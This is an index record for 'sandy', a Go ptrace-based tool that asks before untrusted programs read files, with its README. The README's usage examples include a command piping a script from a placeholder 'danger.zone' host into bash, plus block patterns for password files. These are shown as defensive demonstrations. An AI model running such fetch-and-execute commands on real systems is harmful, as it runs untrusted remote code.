{"id":13630581,"url":"https://github.com/craigmulligan/sandy","last_synced_at":"2025-04-17T17:31:27.254Z","repository":{"id":93937585,"uuid":"232180448","full_name":"craigmulligan/sandy","owner":"craigmulligan","description":"A tiny \"sandbox\" to run untrusted code 🏖️","archived":true,"fork":false,"pushed_at":"2020-01-19T10:43:45.000Z","size":6302,"stargazers_count":338,"open_issues_count":3,"forks_count":7,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-04-15T00:03:48.197Z","etag":null,"topics":["cli","golang","ptrace"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/craigmulligan.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2020-01-06T20:32:30.000Z","updated_at":"2025-03-13T08:11:25.000Z","dependencies_parsed_at":"2023-05-11T14:30:54.235Z","dependency_job_id":null,"html_url":"https://github.com/craigmulligan/sandy","commit_stats":null,"previous_names":["hobochild/sandy"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/craigmulligan%2Fsandy","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/craigmulligan%2Fsandy/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/craigmulligan%2Fsandy/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/craigmulligan%2Fsandy/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/craigmulligan","download_url":"https://codeload.github.com/craigmulligan/sandy/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":249359981,"owners_count":21257143,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cli","golang","ptrace"],"created_at":"2024-08-01T22:01:47.907Z","updated_at":"2025-04-17T17:31:27.008Z","avatar_url":"https://github.com/craigmulligan.png","language":"Go","funding_links":[],"categories":["Go"],"sub_categories":[],"readme":"# Sandy\n\n\u003e A tiny sandbox to run untrusted code. 🏖️\n\nSandy uses Ptrace to hook into READ syscalls, giving you the option to accept or deny syscalls before they are executed.\n\n**WARNING**: While sandy is able to intercept READ syscalls there are a variety of ways to get around this. Full details can be found in the [hackernews thread](https://news.ycombinator.com/item?id=22025986). Some of which can be patched to catch simple attacks, but you should use sandy with the expectation that it is better than nothing but it is not true isolation.\n\n## Usage\n\n```\nUsage of ./sandy:\n\n  sandy [FLAGS] command\n\n  flags:\n    -h\tPrint Usage.\n    -n value\n        A glob pattern for automatically blocking file reads.\n    -y value\n        A glob pattern for automatically allowing file reads.\n```\n\n## Use cases\n\n### You want to install anything\n\n```shell\n\u003e sandy -n \"/etc/password.txt\" npm install sketchy-module\n\n  BLOCKED READ on /etc/password.txt\n```\n\n```shell\n\u003e sandy -n \"/etc/password.txt\" bash \u003c(curl  https://danger.zone/install.sh)\n\n  BLOCKED READ on /etc/password.txt\n```\n\n### You are interested in what file reads you favourite program makes.\n\nSure you could use strace, but it references file descriptors sandy makes the this much easier at a glance by printing the absolute path of the fd.\n\n```\n\u003e sandy ls\nWanting to READ /usr/lib/x86_64-linux-gnu/libselinux.so.1 [y/n]\n```\n\n### You _don't_ want to buy your friends beer\n\nA friend at work knows that you are security conscious and that you keep a `/free-beer.bounty` file in home directory. With the promise of a round of drinks and office wide humiliation Dave tries to trick you with a malicious script under the guise of being a helpful colleague.\n\nYou run there script with sandy and catch him red handed.\n\n```shell\n\u003e sandy -n *.bounty bash ./dickhead-daves-script.sh\n\n  BLOCKED READ on /free-beer.bounty\n```\n\n**NOTE**: It's definitely a better idea to encrypt all your sensitive data, sandy should probably only be used when that is inconvenient or impractical.\n\n**NOTE**: I haven't made any effort for cross-x compatibility so it currently only works on linux. I'd happily accept patches to improve portability.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcraigmulligan%2Fsandy","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcraigmulligan%2Fsandy","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcraigmulligan%2Fsandy/lists"}